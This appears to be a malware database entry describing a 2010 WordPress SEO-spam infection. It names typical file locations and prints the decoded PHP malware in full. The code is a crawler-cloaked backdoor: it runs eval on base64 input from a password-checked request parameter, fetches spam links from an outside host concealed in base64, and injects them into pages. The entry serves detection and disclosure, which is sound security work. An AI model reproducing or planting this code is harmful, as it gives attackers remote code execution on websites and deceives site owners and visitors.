Description Malware used on a large scale SEO SPAM work:
http://blog.sucuri.net/2010/05/seo-spam-network-code-used-and-more.html
http://blog.sucuri.net/2010/05/seo-spam-network-details-of-wp-includes.html
http://blog.sucuri.net/2010/05/it-is-not-over-seo-spam-on-sites.html
It has a random name and is generally hidden at the top directory of a site (kip.php,
fwwkd.php, mrsk.php, .data.php, etc), inside the wp-content/uploads directory
(fonction.php, wp-links.php, etc) and inside a random directory on the wp-includes.
It is also at the wp-includes/index.php.
In some of the variations it loads the spam links from: http://dvc44ftgr.com/
Affecting: Any WordPress hacked during Feb/Mar/Apr/May 2010
Malware dump:
Decoded text:
if(function_exists(‘ob_start’)&&!isset($GLOBALS['mr_no']))
{
GLOBALS['mr_no']=1;
if(!function_exists(‘mrobh’))
{
if(!function_exists(‘gml’))
{
function gml()
{
if(stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)||stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))
{
if((md5($_REQUEST["mmmakowoiwow002"])==”a3934dbe20b0b3e9bbe7a9efcc6526f4″)&&
(isset($_REQUEST["mmmakowoiwow001"])))
{
$R8725029EA89712EED8670BAE64D30E47=base64_decode($_REQUEST["mmmakowoiwow001"]);
return “Execution…$R8725029EA89712EED8670BAE64D30E47n”.eval($R8725029EA89712EED8670BAE64D30E47);
}
$RAF63EAA7A2D15CA59ABB95B6FD1AFEBF=”http://”.base64_decode(“ZHZjNDRmdGdyLmNvbQ==”).”/links/”.rand(0,250).”.txt?ip=”.$_SERVER["REMOTE_ADDR"].”&host=”.rawurlencode($_SERVER["HTTP_HOST"]).”&agent=”.rawurlencode($_SERVER["HTTP_USER_AGENT"]);
$RF48BFF9055F46B9483BC90DC0A160E67=”";
if (function_exists(“curl_init”))
{
$R7DF481D066138CF7B5D7DA19BCB2A874 = @curl_init();
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_URL, $RAF63EAA7A2D15CA59ABB95B6FD1AFEBF);
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_TIMEOUT, 15);
@curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_ENCODING , “gzip”);
$RF48BFF9055F46B9483BC90DC0A160E67=@curl_exec ($R7DF481D066138CF7B5D7DA19BCB2A874);
@curl_close ($R7DF481D066138CF7B5D7DA19BCB2A874);
}
else
{
$RF48BFF9055F46B9483BC90DC0A160E67=@file_get_contents($RAF63EAA7A2D15CA59ABB95B6FD1AFEBF);
}
}
return $RF48BFF9055F46B9483BC90DC0A160E67;
}
}
if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack(‘v’,substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header(‘Content-Encoding: none’); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match(‘/</body/si’,$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace(‘/(</body[^>]*>)/si’,gml().”n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start(‘mrobh’); } }
Loading 
